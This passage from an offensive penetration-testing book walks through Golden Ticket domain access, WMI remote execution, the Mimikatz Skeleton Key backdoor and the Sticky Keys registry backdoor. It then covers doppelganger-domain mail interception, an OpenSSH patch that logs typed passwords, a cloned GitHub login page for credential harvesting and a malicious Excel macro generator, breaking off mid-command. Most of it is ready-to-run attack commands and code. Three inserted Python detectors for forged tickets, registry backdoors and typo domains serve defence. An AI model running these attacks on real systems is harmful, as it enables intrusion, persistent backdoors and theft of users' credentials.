Importing “lab” Kerberos Tickets 


If we do a listing on the Domain Controller, we can see that we now have full access to the DC. They 
could have changed every user account password after the initial hashdump, but with the krbtgt hash, 
we can create any Kerberos ticket we want. 









meterpreter > shell 
Process 2644 created. 
Channel 7 created. 
Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 

C:\Users\testuser1\Desktop>dir \\DC\C$ 
dir \\DC\C$ 
 Volume in drive \\DC\C$ has no label. 
 Volume Serial Number is 40F8-1BB4 

 Directory of \\DC\C$ 

08/22/2013  07:52 AM    <DIR>          PerfLogs 
12/28/2014  02:28 PM    <DIR>          Program Files 
08/22/2013  07:39 AM    <DIR>          Program Files (x86) 
01/06/2015  10:52 PM    <DIR>          Share 
12/28/2014  02:28 PM    <DIR>          Users 
01/05/2015  01:02 AM    <DIR>          Windows 
               0 File(s)              0 bytes 
               6 Dir(s)  20,697,817,088 bytes free 

C:\Users\testuser1\Desktop> 

Accessing the Domain Controller 
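As an added defender-side example (my code, not the book's): the listing above shows the forged "lab" TGT valid from 2015 to 2025, while a real KDC never issues a TGT beyond the domain's maximum ticket lifetime (10 hours by default). The parser below reads kiwi-style kerberos_ticket_list lines (the sample is constructed) and flags tickets whose lifetime exceeds policy or whose realm string is not the real domain name; a realm of "hacker" where the domain is HACKER.TESTLAB is the second tell visible above.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the layout of the kiwi kerberos_ticket_list output
# shown earlier (not a real capture). Column order: server, client, start,
# end, flags. The last line mimics the forged "lab" TGT with a ten-year life.
SAMPLE_TICKET_LIST = """\
Server  Client  Start  End  Flags
krbtgt/HACKER.TESTLAB @ HACKER.TESTLAB  testuser1 @ HACKER.TESTLAB  2015-01-08 05:22:23.000  2015-01-08 15:22:23.000  60a10000 (NAME_CANONICALIZE, PRE_AUTHENT, INITIAL, RENEWABLE, FORWARDABLE)
cifs/dc.hacker.testlab @ HACKER.TESTLAB  testuser1 @ HACKER.TESTLAB  2015-01-08 05:22:23.000  2015-01-08 15:22:23.000  40a50000 (NAME_CANONICALIZE, OK_AS_DELEGATE, PRE_AUTHENT, RENEWABLE, FORWARDABLE)
krbtgt/hacker @ hacker  lab @ hacker  2015-01-07 08:37:54.000  2025-01-07 08:37:54.000  40e00000 (PRE_AUTHENT, INITIAL, RENEWABLE, FORWARDABLE)
"""

TICKET_RE = re.compile(
    r"^(?P<server>\S+) @ (?P<server_realm>\S+)\s+"
    r"(?P<client>\S+) @ (?P<client_realm>\S+)\s+"
    r"(?P<start>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+"
    r"(?P<end>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+"
    r"(?P<flags_hex>[0-9a-fA-F]+) \((?P<flags>[^)]*)\)\s*$"
)
TS_FMT = "%Y-%m-%d %H:%M:%S"


def parse_ticket_list(text):
    """Parse ticket lines into dicts; the header and unparseable lines are skipped."""
    tickets = []
    for line in text.splitlines():
        m = TICKET_RE.match(line.strip())
        if not m:
            continue
        t = m.groupdict()
        t["start"] = datetime.strptime(t["start"], TS_FMT)
        t["end"] = datetime.strptime(t["end"], TS_FMT)
        t["flags"] = [f.strip() for f in t["flags"].split(",") if f.strip()]
        t["is_tgt"] = t["server"].lower().startswith("krbtgt/")
        tickets.append(t)
    return tickets


def suspicious_tickets(tickets, known_realms, max_tgt_lifetime=timedelta(hours=10)):
    """Return (ticket, reasons) pairs for tickets that look forged.

    A KDC never issues a TGT that outlives the domain's maximum ticket
    lifetime (10 hours by default), so a TGT valid for years was minted
    offline from the krbtgt hash. A realm string that does not match the
    real domain name (case-sensitive) is a second, weaker indicator.
    """
    findings = []
    for t in tickets:
        reasons = []
        lifetime = t["end"] - t["start"]
        if t["is_tgt"] and lifetime > max_tgt_lifetime:
            reasons.append("lifetime %s exceeds policy %s" % (lifetime, max_tgt_lifetime))
        if t["server_realm"] not in known_realms or t["client_realm"] not in known_realms:
            reasons.append("realm %r/%r is not an expected realm"
                           % (t["server_realm"], t["client_realm"]))
        if reasons:
            findings.append((t, reasons))
    return findings


if __name__ == "__main__":
    for ticket, why in suspicious_tickets(parse_ticket_list(SAMPLE_TICKET_LIST),
                                          known_realms={"HACKER.TESTLAB"}):
        print("%s for %s: %s" % (ticket["server"], ticket["client"], "; ".join(why)))
```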


With the Golden Ticket, we have access to servers, and can drop files, but how can we execute 
commands using the Kerberos Domain Admin Ticket? 


As shown in prior chapters, WMIC supports the ability to execute remote commands. This command 
uses the current Kerberos tickets against a remote server (node). We are going to execute a ping 
command and write its output to a file on a remote Windows 8 server, from our compromised Windows 7 
box that holds the Golden Ticket. 


• wmic /authority:"Kerberos:hacker.testlab\win8" /node:win8 process call create 
"cmd /c ping 127.0.0.1 > C:\log.txt" 


C:\Users\testuser1\Desktop>wmic /authority:"Kerberos:hacker.testlab\win8" /node:win8 process call create "cmd /c ping 127.0.0.1 > C:\log.txt" 
Executing (Win32_Process)->Create() 
Method execution successful. 
Out Parameters: 
instance of __PARAMETERS 
{ 
        ProcessId = 4576; 
        ReturnValue = 0; 
}; 

WMI and Kerberos Ticket 


Double-checking our Windows 8 host, we see that the command was successful and we can now 
move laterally throughout the whole domain. 




[Screenshot: Windows Explorer on the Windows 8 host showing log.txt in Local Disk (C:), opened in Notepad:] 

Pinging 127.0.0.1 with 32 bytes of data: 
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 

Ping statistics for 127.0.0.1: 
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
Approximate round trip times in milli-seconds: 
    Minimum = 0ms, Maximum = 0ms, Average = 0ms 

Validate Command Execution 


Skeleton Key 


As a penetration tester, one of your greatest resources is monitoring what the real bad guys are doing. 
For example, Dell Secureworks identified malware that would backdoor privileged Active Directory 
accounts: 

http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/ . 


Luckily for us, Benjamin Delpy and his amazing tool Mimikatz implemented the Skeleton Key feature. 
{28} This attack will backdoor a Domain Administrative account. Let’s say you have already gained 
a domain admin account and you were able to log into a domain controller (remember, you will have 
to do this on every domain controller in the environment). We can put a copy of our modified 
Mimikatz on there so we don’t trigger antivirus. 


Installing our Skeleton Key is pretty easy: 

• mimikatz.exe “privilege::debug” “misc::skeleton” exit 












C:\Users\lab\Desktop\x64>mimikatz.exe "privilege::debug" "misc::skeleton" exit 

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Jan 22 2015 22:16:09) 
 .## ^ ##. 
 ## / \ ##  /* * * 
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo) 
  '#####'                                    with 15 modules * * */ 

mimikatz(commandline) # privilege::debug 
Privilege '20' OK 

mimikatz(commandline) # misc::skeleton 
[KDC] data 
[KDC] struct 
[KDC] keys patch OK 
[RC4] functions 
[RC4] init patch OK 
[RC4] decrypt patch OK 

mimikatz(commandline) # exit 
Bye! 

Skeleton Key 


If we go back to any computer on the network and try to connect to the Domain Controller, of course 
we won’t have access with our regular Active Directory account. We try to run “dir \\dc\c$” to read 
the C-Drive on the domain controller. But don’t forget about our skeleton key. 


Even if we don’t know the password of the domain admin account “lab”, with the Skeleton Key 
implemented, we can use the new backdoor password of “mimikatz”. 


To demonstrate this, we can mount a drive from any computer on the network using the password 
“mimikatz” and the “lab” account from which we executed the skeleton key. 


In the first command we try to read files from the domain controller, but are unsuccessful: 

• dir \\dc\c$ 


Next, we mount a share drive to the domain controller’s C-Drive using the “lab” account and the 
backdoor password “mimikatz”: 

• net use * \\dc\c$ mimikatz /user:lab@hacker.testlab 





C:\Users\testuser1\Desktop>dir \\dc\C$ 
Access is denied. 

C:\Users\testuser1\Desktop>net use * \\dc\c$ mimikatz /user:lab@hacker.testlab 
Drive Z: is now connected to \\dc\c$. 
The command completed successfully. 

C:\Users\testuser1\Desktop>dir Z: 
 Volume in drive Z has no label. 
 Volume Serial Number is 40F8-1BB4 

 Directory of Z:\ 

08/22/2013  08:52 AM    <DIR>          PerfLogs 
12/28/2014  03:28 PM    <DIR>          Program Files 
08/22/2013  08:39 AM    <DIR>          Program Files (x86) 
01/19/2015  05:35 PM    <DIR>          Share 
02/05/2015  12:29 AM    <DIR>          Users 
01/05/2015  02:02 AM    <DIR>          Windows 
               0 File(s)              0 bytes 
               6 Dir(s)  20,905,398,272 bytes free 

Skeleton Key - Backdoor Password 


We now have full access into the domain controller with our backdoor password. Both the original 
domain admin’s password and mimikatz will work at the same time. 


Sticky Keys 


Sticky Keys is one of my favorite persistence methods. If you have never dealt with sticky keys 
before, try hitting shift 5 times on any Windows host. Microsoft states that: 


“StickyKeys is designed for people who have difficulty holding down two or more keys at a time. 
When a shortcut requires a key combination such as Ctrl+P, StickyKeys allows you to press one key 
at a time instead of pressing them simultaneously.” {29} 


We can take advantage of sticky keys by replacing the sticky key executable with a shell. The old 
method used to manually replace sethc with cmd, but this can now be done within registry settings. 


• REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" 

• REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 

• REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 


Two additional settings you might need to run: 





• Change firewall setting to allow RDP 

o netsh advfirewall firewall set rule group="remote desktop" new enable=Yes 

• Enable Remote Desktop Connections 

o REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 


Don’t forget the power of WMI and being able to trigger these settings remotely. Remember, you will 
need a privileged local administrative account or a domain admin account. 

• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\windows\system32\cmd.exe\" /f" 

• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f" 

• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v SecurityLayer /t REG_DWORD /d 0 /f" 

Optional Commands: 

• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes" 

• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f" 


Because we are leveraging WMI, you also have the ability to use Kerberos, if needed, by changing 
the username/password to /authority:"Kerberos:[Domain]\[Server]". Remember pass the ticket? 


Once we have configured these registry settings, we can RDP to that host without any credentials, hit 
shift 5 times, and we have a system shell. 


If you ever lose your original shell and the user changes their password, you still have your backdoor. 




Sticky Keys 
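An added defender-side check (my code, not from the book): the REG ADD settings above leave exact traces, so a .reg export of the two keys can be audited offline. The parser handles the string and dword value types used here; the sample export is constructed to contain precisely the values the commands set.

```python
import re

# Constructed .reg export (not from the book) in the layout "reg export"
# produces, holding exactly the values the Sticky Keys commands above set.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\windows\\system32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000000
"SecurityLayer"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"""

IFEO_MARKER = "\\image file execution options\\"   # compared case-insensitively
RDP_TCP_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')


def parse_reg_export(text):
    """Return {key_path: {value_name: value}} for a .reg export.

    Handles the two value types used here: quoted strings (with \\ and \"
    escapes) and dword:xxxxxxxx. Any other type is kept as its raw text.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if not m or current is None:
            continue
        data = m.group("data")
        if data.startswith("dword:"):
            value = int(data[6:], 16)
        elif data.startswith('"') and data.endswith('"'):
            value = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        else:
            value = data
        keys[current][m.group("name")] = value
    return keys


def audit_sticky_keys(keys):
    """List findings matching the Sticky Keys backdoor and its RDP changes."""
    findings = []
    for path, values in keys.items():
        if IFEO_MARKER in path.lower() and "Debugger" in values:
            image = path.rsplit("\\", 1)[-1]
            # Any IFEO Debugger value deserves review; a shell registered for
            # an accessibility binary such as sethc.exe is the pattern above.
            findings.append("IFEO Debugger on %s -> %s" % (image, values["Debugger"]))
    rdp = keys.get(RDP_TCP_KEY, {})
    if rdp.get("UserAuthentication") == 0:
        findings.append("RDP-Tcp UserAuthentication=0 (Network Level Authentication off: "
                        "logon screen reachable before authentication)")
    if rdp.get("SecurityLayer") == 0:
        findings.append("RDP-Tcp SecurityLayer=0 (legacy RDP security layer, no TLS)")
    if keys.get(TS_KEY, {}).get("fDenyTSConnections") == 0:
        findings.append("fDenyTSConnections=0 (Remote Desktop connections enabled)")
    return findings


if __name__ == "__main__":
    for finding in audit_sticky_keys(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(finding)
```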


Conclusion 


I hope this chapter was able to get you comfortable with getting onto the network and moving laterally 
through the network. There are a large number of attacks that can help in both lateral movement and 
privilege escalation, but it really comes down to understanding what is in scope of your test and what 
has the highest probability of assisting you. It might take a few of the attacks in the Lateral Movement 
section to get you to a Domain Administrator, but keep this chapter handy as sometimes you will run 
into a brick wall and something in this book might just get you out of a jam. 







The Screen - Social Engineering 


If client attacks are in the scope of your tests, social engineering is your "go to" attack. There are 
many different ways to perform social engineering attacks and these can range from domain attacks to 
spear phishing, or even dropping USB sticks. Since social engineering attacks really use your own 
creativity, I will just go over a few examples that I have found to be fruitful. 


Doppelganger Domains 

I spent a lot of research time looking into doppelganger domains and trying to find the most efficient 
and most “bang for your buck” attacks. You can find more in my research paper here: 

http://www.wired.com/threatlevel/2011/09/doppelganger-domains/ . 

The concept of my research paper was to brute-force company domains for valid subdomains that had 
MX records. For my next few examples we have two different fictitious companies who utilize their 
sub-domains for email: us.company.com and uk.company.com. What I had done was to purchase all 
domains for uscompany.com, ukcompany.com and so on. This is because end users very frequently 
make the mistake of forgetting to type in the period between the domain and sub-domain. 


SMTP Attack 


Once I purchased these domains, I set up an SMTP server, configured the MX records, and finally set 
all SMTP servers as catch-all servers. This means that if anyone emails to the domain I own, 
regardless of to whom it is sent, I would record/forward all those emails to an account of my choice. 


This is usually enough to prove that you can successfully capture sensitive data and that you will see a 
lot of sensitive emails from the corporation. If you go to the article above, you will see what type of 
data was gathered and how many times we were able to get SSH/VPN/Remote Access into a 
company. We also took this proof of concept attack one step farther. 


In the following example, we are targeting the fake site bank.com, who has a subsidiary in Russia. 
The fake bank owns ru.bank.com and has MX records to that FQDN. Also, company.com (another 
fake company), owns us.company.com and has MX records for that FQDN. In this fake example, we 
purchase both the doppelganger domains uscompany.com and rucompany.com. If anyone mistypes an 
email to either domain, we will be able to inject ourselves into the middle of this conversation. Using 
a few simple python scripts, when we receive an email from john@us.company.com to 
bob@rubank.com (mistyped doppelganger for ru.bank.com), our script will take that email and create 
a new email to bob@ru.bank.com (the proper email address) and sourced from 
john@uscompany.com (the mistyped doppelganger that we own). That means any reply response to 
John from Bob will come back through us. Now, we have a full "Man in the MailBox" configured and 
can either just passively listen or attack the victims based on the trust factor they have with each 
other. 


Man in the MailBox (MITMB) 

[Diagram, reconstructed from the figure labels:] 

Original E-mail Conversation: @us.company.com <-> @ru.bank.com 

MITMB: 
1. E-mail sent to the wrong address: @us.company.com -> @rubank.com 
2. Using the recipient doppelganger, we forward the request to the proper address after modifying the email: @uscompany.com -> @ru.bank.com 
3. The user at ru.bank.com responds back with the requested information: @ru.bank.com -> @uscompany.com 
4. We respond to the original sender with the information and the sender is unaware of the incident: @rubank.com -> @us.company.com 

* Red domains (uscompany.com, rubank.com) are the domains under our control 

Man in the MailBox Example 
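An added example from the defending side (my code, not from the book): the same missing-dot rule that produced uscompany.com and rubank.com lets a mail gateway flag outbound messages addressed to a doppelganger of a domain the organisation actually uses. The sample domains and recipients are constructed; doppelganger_names generalises the page's rule to every internal dot, not only the one between sub-domain and domain.

```python
# Constructed sample: domains the organisation and its partners legitimately
# mail through (the page's fictitious us.company.com and ru.bank.com), plus a
# few outbound recipient addresses as a mail gateway log might record them.
PROTECTED_DOMAINS = ["us.company.com", "uk.company.com", "ru.bank.com"]

SAMPLE_RECIPIENTS = [
    "bob@ru.bank.com",        # correct
    "bob@rubank.com",         # missing dot: doppelganger
    "alice@uscompany.com",    # missing dot: doppelganger
    "carol@uk.company.com",   # correct
    "dave@example.org",       # unrelated
]


def doppelganger_names(fqdn):
    """Names produced by dropping one internal dot of fqdn.

    The page's research targeted the dot between sub-domain and domain
    (us.company.com -> uscompany.com); this generalises to every dot except
    the one before the TLD, so deeper labels (mail.us.company.com) are
    covered too. A bare domain.tld has no internal dot and yields nothing.
    """
    labels = fqdn.lower().strip(".").split(".")
    variants = set()
    for i in range(len(labels) - 2):
        merged = labels[:i] + [labels[i] + labels[i + 1]] + labels[i + 2:]
        variants.add(".".join(merged))
    return variants


def build_doppelganger_index(protected):
    """Map every doppelganger name back to the legitimate FQDN it mimics."""
    index = {}
    for fqdn in protected:
        for name in doppelganger_names(fqdn):
            index[name] = fqdn.lower()
    return index


def flag_misaddressed(recipients, protected):
    """Return [(address, intended_domain)] for recipients whose domain is a
    doppelganger of a protected domain. A gateway can quarantine these
    instead of delivering them to whoever registered the typo domain."""
    index = build_doppelganger_index(protected)
    hits = []
    for addr in recipients:
        domain = addr.rsplit("@", 1)[-1].lower()
        if domain in index:
            hits.append((addr, index[domain]))
    return hits


if __name__ == "__main__":
    for addr, intended in flag_misaddressed(SAMPLE_RECIPIENTS, PROTECTED_DOMAINS):
        print("%s looks like a mistyped %s address" % (addr, intended))
```

The same index lists the names worth registering defensively or watching in passive DNS.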


SSH Attack 


During my research, I also configured SSH servers with the doppelganger domains to see if people 
mistyped SSH servers and revealed their SSH passwords. There are a couple of things that need to be 
configured for a successful attack. 

First, set the DNS A record to point all records to a particular IP. For example, I set the A record 
host to and pointed the host record to my IP address. Any subdomain within the doppelganger will 
point back to my server. This means the following domains will all point back to a single IP: 

• test.uscompany.com 

• dev.uscompany.com 

• deadbeef.uscompany.com 

Then, set up an SSH server that logs both the username and password. In my case, I configured a 
server running Ubuntu 11.10. Since normal sshd does not record the passwords, I had to modify a 
version of sshd. This is done by downloading openssh portable 5.9p1: 
wget http://mirror.team-cymru.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz 

To Extract OpenSSH: 

• tar xvfz openssh-5.9p1.tar.gz 

• Go into the openssh directory: 

o cd openssh-5.9p1 

It is required to modify the auth-passwd.c file before compiling sshd. Below is what I changed, but I 
have also included the whole auth-passwd.c file you should replace 
[ https://www.securepla.net/download/auth-passwd.c ]: {30} 


    if (!sys_auth_passwd(authctxt, password)) 
    { 
        /* failed login: record username, password and source IP */ 
        FILE *garp; 

        garp = fopen("/var/log/sshd_logged", "a"); 
        if (garp != NULL) { 
            chmod("/var/log/sshd_logged", 0600); 
            fprintf(garp, "%s:%s:%s\n", authctxt->user, password, get_remote_ipaddr()); 
            fclose(garp); 
        } 
    } 

    return (result && ok); 


Now, when I have an invalid login, I write out the username, password, and IP address into a file 
located in /var/log/sshd_logged. 

After replacing the auth-passwd.c file, let's compile and make it: 

• sudo ./configure --prefix=/opt --sysconfdir=/etc/ssh 

• make 

• sudo make install 


We should now have a working version of our new sshd service. To start sshd: 

• /opt/sbin/sshd 

Then, run the following command and you should see username/password combinations scroll by: 

• tail -f /var/log/sshd_logged 


Output: 

• root: HarmonOl: 192.168.10.10 

• admin: AMW&369!: 192.168.10.111 

• tomihama: tomihhama: 192.168.10.24 

• root: hx7wnk: 192.168.10.19 


We are successfully recording username/password combinations. You will have to be extremely 
patient with this attack and hope a developer or IT user mistypes the domains to SSH. I love these 
attacks because they are not the normal types of attacks and give you the chance to get creative with 
them. 


Phishing 


Phishing, or email in general, is one of the most commonly used and effective vectors for remote 
attacks. This is because they rely on users as victims, instead of unpatched or misconfigured services. 



Victims can be easily swayed to perform actions generally based on fear and urgency. The fear and/or 
urgency usually stems from some type of financial loss, personal loss, or the fear of missing out. If 
you can trigger one of these emotions, it can cause a victim to do things they wouldn’t normally do. 
Although there are numerous books on manipulating people, two books I would recommend are: 

• Behavioral Programming (2015): The Manipulation of Social Interaction - 
http://amzn.to/1CJGb4v 

• Social Engineering: The Art of Human Hacking (2010) - http://amzn.to/1CJH3pO 


These books describe types of social interactions, manipulation of people, word selection, and many 
tools for all methods of social engineering. 


In the first THP, I focused on using Metasploit pro, but I decided to go with open source in this 
example, which allows me to get more creative. After setting up a few phishing exercises, you will 
see that it is pretty easy. 


There are plenty of open source phishing tools, such as: 

• Cartero: http://section9labs.github.io/Cartero/ 

• Phishing Frenzy: http://www.phishingfrenzy.com/ 

• Social Engineering Toolkit: https://github.com/trustedsec/social-engineer-toolkit 


However, after running numerous phishing attacks, I found that having numerous custom scripts ready 
for different scenarios works best. Although this might not work for your situation, this should help 
you get different ideas for a successful campaign. 


Manual Phishing Code 

( https://github.com/cheetz/spearphishing )(Kali Linux): 


This is a sample beta code I have written to take care of my spear phishing campaigns. The code 
repository is located here: https://github.com/cheetz/spearphishing and it is really up to you to 
customize it for your own campaign. In the default code, we are going to use GoDaddy’s SMTP 
services, but you can easily customize it according to your own SMTP server. The spear.py client 
script will modify an html page that will get sent to all its victims. Take time to read and understand 
the code before executing. Let’s walk through a phishing example. 

Setting up the client to send out emails: 

• cd /opt/spearphishing/client 

• edit spear.py and modify the following: 

o domain = "suck.yourdomainthatyouown.com" #The Domain That You Own 
o companyname = "SUCK" #The Company Name 
o me = "auto-confirm@" + domain #Email return address 
o host = 'smtpout.secureserver.net' #Godaddy SMTP server 
o login = '' #Godaddy Login 
o password = '' #Godaddy password 

• edit emails.txt and add email addresses 


To run the SMTP script: 

• python ./spear.py 


[Screenshot: the phishing e-mail as received in the victim's webmail. Subject: Your SUCK order of "2" x TV Stick; sender auto-confirm@suck.<our domain>. The body is an order confirmation (Order #142-3644477-72229022, placed Thursday, November 13, 2014) with an estimated delivery date of Wednesday, December 3, 2014, Two-Day Shipping, a shipping address, "2 x TV Stick, $39.00" and a "GET A $10 GIFT CARD" offer. The status bar shows the hovered link pointing to https://suck.<our domain>/?id_session=<md5>&ge=<base64>.] 

Sample Spearphishing Email 


If you look closely at the bottom, all URLs point to our domain with both the session ID and ge ID. 
One thing you need to do is heavily test your phishing exercises. There are some phishing campaigns 
that get flagged as SPAM and others that don’t. You need to find that right balance. 


Web Filtering Bypass for Your Domains: 

Once in a while, I will see a company actively using a web proxy for all of their Internet traffic. In 
this situation, anything that isn't categorized will be blocked and my reverse shells can’t seem to work 
around their filter. However, there are things you can do to help your success rate. For doppelganger 
domains that I have purchased specifically for testing, I set up a simple CNAME or Canonical Name 
on that domain to point to the original domain that I have doppelgangered. I will let that doppelganger 
domain sit there for a few days or weeks before the test. Why? This will allow the site to get 
automatically crawled by a number of different systems. When the crawlers see the CNAME 
configured to the real site, they will assume that it was purchased by that company and turn that 
domain into the same category of approved domains. Once your test starts, just remove the CNAME 
and configure the IP of the actual malicious server. 


Setting Up the Server: 




















We are going to set up a web server that will look like a real authentication page to capture 
credentials. 

• cd /opt/set 

• ./setoolkit 

• 1) Social-Engineering Attacks 

• 2) Website Attack Vectors 

• 3) Credential Harvester Attack Method 

• 2) Site Cloner 

• set:webattack> IP address for the POST back in Harvester/Tabnabbing: [your kali 
IP] 

• set:webattack> Enter the url to clone: [Website to Clone] 




[-] This option is used for what IP the server will POST to. 
[-] If you're using an external IP, use your external IP for this 
set:webattack> IP address for the POST back in Harvester/Tabnabbing: 192... 
[-] SET supports both HTTP and HTTPS 
[-] Example: http://www.thisisafakesite.com 
set:webattack> Enter the url to clone: https://github.com/login 

[*] Cloning the website: https://github.com/login 
[*] This could take a little bit... 

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. 
[*] Apache is set to ON - everything will be placed in your web root directory of apache. 
[*] Files will be written out to the root directory of apache. 
[*] ALL files are within your Apache directory since you specified it to ON. 
[!] Apache may be not running, do you want SET to start the process? [y/n]: y 
Apache Webserver is set to ON. Copying over PHP file to the website. 
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt 
Feel free to customize post.php in the /var/www directory 
[*] All files have been copied to /var/www 
{Press return to continue} 

Social Engineering Toolkit - Clone Site 


Let's make some quick modifications. To help make spear phishing more successful, make sure it 
looks authentic and minimize the amount of information the user needs to input. A simple way to 
accomplish this is to add their email address in the login field. This makes it look like they have 
logged onto this site before. 


Once you have cloned a site, all files are copied to /var/www. Let's modify the files: 

1. cd /var/www 

2. We need to make the file able to support server side scripting: 

o mv index.html index.php 

3. We need to identify the username field. Open the original login page, right-click in the 
Username field, and choose Inspect Element (in Firefox). We can quickly see where the code for this 
field is and modify our file to include the victim’s email address. 



[Screenshot: the cloned sign-in page (Username / Password / Sign in) with the Firefox Inspector open on the username field. The relevant markup:] 

<label for="login_field"></label> 
<input id="login_field" class="input-block" type="text" tabindex="1" name="login" autofocus="autofocus" ...> 
<label for="password"></label> 
<input id="password" class="input-block" type="password" tabindex="2" name="password"></input> 

Fake Login Page 

[Screenshot: the Firefox right-click context menu with "Inspect Element (Q)" highlighted] 


4. gedit index.php and locate the code from step 3 (in this specific scenario, we can search for 
login_field) and add the code below. 4a automatically appends the user’s email in the login 
field and 4b is used solely for tracking purposes. 

a. Inside the login input field, add: value="<?php if(isset($_GET['ge'])) {echo base64_decode($_GET['ge']);} ?>" 

b. Somewhere below, add: <input type="hidden" name="user_id" value="<?php print $_GET["id_session"]; ?>"/> 

Code Modifications to Include User Email Address 


Now, we can go visit the cloned website we created. If we add two additional parameters to the 
index.php page, we can see how this small change can increase our success rate. The ge field accepts 
a base64 string, here “Ym9va0B0aGVoYWNrZXJwbGF5Ym9vay5jb20=”, which decodes to 
book@thehackerplaybook.com. There is also an id_session field that is just an MD5 of the original 
email address. I do this so that, in the event they decide to change the username email address to a 
different email address, I will still know which original user is inputting these requests. 



[Screenshot: the cloned sign-in page with the Username field pre-filled with book@thehackerplaybook.com] 

Login with User Email 


When anyone types in their password and hits the “Sign in” button, this information will all be logged 
to a file called harvester, along with the date. Let’s read the file by: cat harvester* 


root@kali:/var/www# cat harvester* 
Array 
( 
    [authenticity_token] => 8nU5hP60AAkZo5KAw== 
    [login] => book@thehackerplaybook.com 
    [password] => happyhacking! 
    [user_id] => 58330bcfdb5c499194603O48c3810134 
    [commit] => Sign in 
) 
root@kali:/var/www# 


Password Results 


The reason I go through the manual method of creating spear phish emails and client servers, is to 
have it look as authentic and specific as possible. There are a lot of different tools that can be 
purchased to provide spear phishing campaigns, but most are limited in the types of sites or templates 
that are included. 


Social Engineering with Microsoft Excel 


In the first book, I explained how to add macros manually to create malicious Excel payloads that can 
be used in Spear Phishing Campaigns. This section is an extension of that. 


Sometimes you find yourself in an environment where you can't use JAVA, or web-based attacks. It 
might be because you have to deliver your payload via an email attachment or want to use physical 
media for your attack (i.e. USB sticks or CDs). One of the best success rates I have had with these 
types of attacks was by utilizing a trust relationship between the attacker and victim and including an 
Excel spreadsheet that had a Meterpreter payload. When I say a trust relationship, I mean find 
someone with whom the victim might regularly communicate files and spoof his or her email address. 
Even better, in the initial Compromised List section, you might have been able to gain a few 
credentials. Log into the corporate Outlook Web Access (OWA) mail server and start emailing 
employees that have regular communication with your compromised credential. 

The problem with using Metasploit to generate its own Excel files is that a lot of times they will 
trigger anti-virus. To mitigate this, we are going to use the same tactics we did in the Lateral 
Movement section and take advantage of PowerShell. 


On your Windows Attacking Host, download Generate-Macro.ps1: 
https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1 

Generate-Macro.ps1 creates a malicious Excel file with a PowerShell payload to connect back to a 
Metasploit Meterpreter handler. It even goes one step farther and adds persistence by creating a vbs 
file in the C:\users\public\ folder and adding a registry setting to call that script upon bootup. 






C:\Users\hp2\Downloads\Generate-Macro-master>powershell -exec bypass 
PS C:\Users\hp2\Downloads\Generate-Macro-master> .\Generate-Macro.ps1 
Enter URL of Invoke-Shellcode script (If you use GitHub, use the raw version): 
